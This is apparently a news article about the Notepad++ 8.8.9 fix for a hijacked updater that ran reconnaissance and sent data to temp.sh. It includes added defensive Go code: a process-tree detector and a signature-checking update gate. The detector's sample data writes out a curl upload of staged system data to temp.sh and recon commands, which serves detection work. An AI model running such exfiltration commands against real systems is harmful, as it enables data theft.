Notepad++, one of the most widely used text editors on Windows, has rolled out version 8.8.9 to patch a serious security flaw that allowed attackers to hijack its update process and push malicious update files to unsuspecting users.
Users Spot Suspicious Update Behavior
The issue came to light when a user on the Notepad++ community forum noticed that Notepad++’s updater, WinGUp, launched a suspicious file called AutoUpdater.exe from the system’s Temp folder. The file quietly executed a series of system-reconnaissance commands, gathering system details such as running tasks, network information, and user data, and storing the output in a file called a.txt.
Moments later, the malware used a curl command to upload that data to temp.sh, a service known for hosting files used in past malware campaigns.
These actions were a red flag because WinGUp doesn’t collect such data, nor does it use the regular Windows curl.exe program. This raised early suspicions among users that either a fake Notepad++ installation had been downloaded or that the program’s update traffic had been hijacked.
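The behaviour described above (the updater spawning an executable from Temp, reconnaissance commands, output staged in a.txt, and curl.exe talking to temp.sh) can be turned into a process-tree detection. The following is an added example and not code from Notepad++ or WinGUp: it walks constructed process-creation records (shaped like Sysmon Event ID 1) and raises one alert per child of the updater whose subtree shows those signals. The updater's file name (gup.exe), the paths and the command lines are assumptions made for the sample data.

```go
package main

import (
	"fmt"
	"path"
	"sort"
	"strings"
)

// ProcEvent is a constructed process-creation record (Sysmon Event ID 1 shape).
type ProcEvent struct {
	PID, PPID int
	Image     string // full path of the executable
	CmdLine   string
}

// Alert describes one suspicious process tree rooted at a child of the updater.
type Alert struct {
	RootPID   int
	RootImage string
	Signals   []string
}

// updaterNames holds the assumed file name of the WinGUp binary.
var updaterNames = map[string]bool{"gup.exe": true}

// reconTools lists utilities the updater has no reason to run.
var reconTools = map[string]bool{
	"tasklist.exe": true, "ipconfig.exe": true, "whoami.exe": true,
	"netstat.exe": true, "systeminfo.exe": true, "net.exe": true,
}

func baseName(p string) string {
	return strings.ToLower(path.Base(strings.ReplaceAll(p, `\`, "/")))
}

// Detect returns one Alert per direct child of the updater whose subtree
// shows reconnaissance commands, curl.exe, staging into a.txt, or temp.sh.
func Detect(events []ProcEvent) []Alert {
	children := map[int][]ProcEvent{}
	for _, e := range events {
		children[e.PPID] = append(children[e.PPID], e)
	}
	var alerts []Alert
	for _, e := range events {
		if !updaterNames[baseName(e.Image)] {
			continue
		}
		for _, child := range children[e.PID] {
			signals := map[string]bool{}
			stack := append([]ProcEvent(nil), children[child.PID]...)
			for len(stack) > 0 { // walk every descendant of the child
				d := stack[len(stack)-1]
				stack = append(stack[:len(stack)-1], children[d.PID]...)
				name, cl := baseName(d.Image), strings.ToLower(d.CmdLine)
				if reconTools[name] {
					signals["recon"] = true
				}
				if name == "curl.exe" { // WinGUp does not use curl.exe
					signals["curl"] = true
				}
				if strings.Contains(cl, "temp.sh") {
					signals["temp.sh"] = true
				}
				if strings.Contains(cl, "a.txt") {
					signals["a.txt"] = true
				}
			}
			if len(signals) == 0 {
				continue
			}
			names := make([]string, 0, len(signals))
			for s := range signals {
				names = append(names, s)
			}
			sort.Strings(names)
			alerts = append(alerts, Alert{child.PID, child.Image, names})
		}
	}
	return alerts
}

// SampleEvents is constructed: one hijacked update chain plus a benign
// installer launched by the same updater process.
var SampleEvents = []ProcEvent{
	{100, 1, `C:\Windows\explorer.exe`, "explorer.exe"},
	{200, 100, `C:\Program Files\Notepad++\notepad++.exe`, "notepad++.exe"},
	{300, 200, `C:\Program Files\Notepad++\updater\gup.exe`, "gup.exe"},
	{400, 300, `C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe`, "AutoUpdater.exe"},
	{500, 400, `C:\Windows\System32\cmd.exe`, "cmd.exe /c tasklist >> a.txt"},
	{510, 500, `C:\Windows\System32\tasklist.exe`, "tasklist"},
	{520, 500, `C:\Windows\System32\ipconfig.exe`, "ipconfig /all"},
	{600, 400, `C:\Windows\System32\curl.exe`, "curl.exe -F file=@a.txt https://temp.sh/upload"},
	{700, 300, `C:\Users\alice\AppData\Local\Temp\npp-installer.exe`, "npp-installer.exe /S"},
}

func main() {
	for _, a := range Detect(SampleEvents) {
		fmt.Printf("pid %d %s: %v\n", a.RootPID, a.RootImage, a.Signals)
	}
}
```

The benign installer (pid 700) is also launched from Temp by the updater, which is why the rule keys on what the child does rather than on where it lives; a legitimate update spawns no reconnaissance or curl.exe descendants and produces no alert.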
Security Researcher Links Multiple Incidents
Soon after, more reports surfaced — this time from security expert Kevin Beaumont, who heard from three separate organizations in East Asia that had experienced similar compromises originating from Notepad++ processes.
According to Beaumont, in each case, Notepad++ processes appeared to be the entry point for threat actors who later carried out hands-on activity inside the victims’ networks.
How The Attack Worked
Notepad++ periodically checks for updates by contacting a URL that returns XML data containing the latest version number and the download link for the corresponding installer. If attackers intercept this traffic and modify the <Location> tag in the XML, the updater will fetch a file from any destination they choose.
Researchers believe attackers intercepted Notepad++’s update traffic and swapped the legitimate download link with a malicious one — an attack made possible because older versions of WinGUp didn’t verify file signatures or certificates. As a result, the rogue installer was treated as a normal update and executed without warning.
Beaumont noted that while large-scale hijacking is difficult, targeted interception — especially within specific regions, industries, or ISPs — is entirely feasible.
Notepad++’s Response
To address the issue, Notepad++ developer Don Ho released:
- Version 8.8.8, on November 18, which forces updates to download only from GitHub, reducing exposure to malicious redirects.
- Version 8.8.9, on December 9, which now verifies digital signatures and certificates for every installer.
If a file is tampered with — or simply not officially signed — the update is immediately blocked.
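The attack path described under "How The Attack Worked" and the two fixes above map onto a small gate the updater can run before executing anything: reject any <Location> that is not an HTTPS URL on github.com (the 8.8.8 change), then refuse to run an installer whose signature does not verify (the 8.8.9 change). The following is an added example, not WinGUp's code: WinGUp checks the installer's Authenticode signature and certificate on Windows, and an Ed25519 signature over the installer bytes stands in for that here so the example runs offline. The <GUP> root element and <Version> tag, the download URLs, and the installer contents are constructed.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/xml"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// updateFeed models the XML the updater fetches. Only <Location> is named
// in the article; the <GUP> root and the <Version> tag are assumptions.
type updateFeed struct {
	XMLName  xml.Name `xml:"GUP"`
	Version  string   `xml:"Version"`
	Location string   `xml:"Location"`
}

// Constructed feeds: the genuine one points at GitHub, the hijacked one
// has had its <Location> rewritten in transit.
const genuineFeed = `<?xml version="1.0"?><GUP><Version>8.8.9</Version>` +
	`<Location>https://github.com/notepad-plus-plus/notepad-plus-plus/releases/download/v8.8.9/npp.8.8.9.Installer.x64.exe</Location></GUP>`
const hijackedFeed = `<?xml version="1.0"?><GUP><Version>8.8.9</Version>` +
	`<Location>https://cdn.example.invalid/AutoUpdater.exe</Location></GUP>`

func ParseFeed(data []byte) (updateFeed, error) {
	var f updateFeed
	err := xml.Unmarshal(data, &f)
	return f, err
}

// CheckLocation enforces the 8.8.8 rule: download only over HTTPS from github.com.
func CheckLocation(raw string) error {
	u, err := url.Parse(raw)
	if err != nil {
		return err
	}
	if u.Scheme != "https" {
		return fmt.Errorf("refusing non-https location %q", raw)
	}
	if !strings.EqualFold(u.Hostname(), "github.com") {
		return fmt.Errorf("refusing location host %q: not github.com", u.Hostname())
	}
	return nil
}

// VerifyInstaller models the 8.8.9 rule. The real updater verifies the
// Authenticode signature and certificate; Ed25519 is a stand-in here.
func VerifyInstaller(pub ed25519.PublicKey, installer, sig []byte) error {
	if !ed25519.Verify(pub, installer, sig) {
		return errors.New("installer signature invalid: update aborted")
	}
	return nil
}

// ShouldInstall is the gate run before the downloaded installer is executed.
func ShouldInstall(feed []byte, pub ed25519.PublicKey, installer, sig []byte) error {
	f, err := ParseFeed(feed)
	if err != nil {
		return err
	}
	if err := CheckLocation(f.Location); err != nil {
		return err
	}
	return VerifyInstaller(pub, installer, sig)
}

// RunScenarios exercises the gate with a genuine update, a hijacked feed and
// a swapped installer. Only the first should pass.
func RunScenarios() (genuine, hijacked, swapped error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	installer := []byte("constructed installer bytes")
	sig := ed25519.Sign(priv, installer)
	genuine = ShouldInstall([]byte(genuineFeed), pub, installer, sig)
	hijacked = ShouldInstall([]byte(hijackedFeed), pub, installer, sig)
	rogue := []byte("constructed rogue installer bytes")
	swapped = ShouldInstall([]byte(genuineFeed), pub, rogue, sig)
	return
}

func main() {
	g, h, s := RunScenarios()
	fmt.Println("genuine update:", g)
	fmt.Println("hijacked feed:", h)
	fmt.Println("swapped installer:", s)
}
```

The two checks are deliberately independent: the origin pin stops the redirect before any download happens, and the signature check catches a tampered file even when it arrives from the expected host, which is why the hijacked feed fails at the first check while the swapped installer fails at the second.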
“Starting with this release, Notepad++ & WinGUp have been hardened to verify the signature & certificate of downloaded installers during the update process. If verification fails, the update will be aborted,” explains the Notepad++ 8.8.9 security notice.
The exact method of traffic hijacking is still under investigation, but users are urged to upgrade to version 8.8.9 immediately and avoid downloading installers from unofficial sources.
What Users Should Do
Given the severity of the flaw, anyone running Notepad++ is strongly urged to upgrade to version 8.8.9 immediately. Older versions remain vulnerable, and their built-in updater cannot reliably detect malicious downloads.
The safest approach is to download the latest version, which also includes additional bug fixes and improvements, all available on the official Notepad++ website and GitHub repository.
